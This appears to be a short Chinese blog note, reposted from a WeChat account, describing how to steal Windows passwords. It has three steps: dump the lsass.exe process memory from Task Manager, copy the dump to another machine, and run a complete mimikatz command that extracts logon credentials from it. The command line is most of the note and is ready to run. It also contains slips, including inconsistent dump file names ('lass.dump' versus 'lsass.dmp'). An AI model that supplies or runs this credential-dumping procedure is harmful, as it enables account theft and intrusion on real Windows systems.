转储获取Windows密码

在公众号上看到的，研究了一下


过程如下：
打开任务管理器 lsass.exe进程，然后选择注册转储文件


然后把lass.dump 弄到本机，放到mimikatz目录下

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit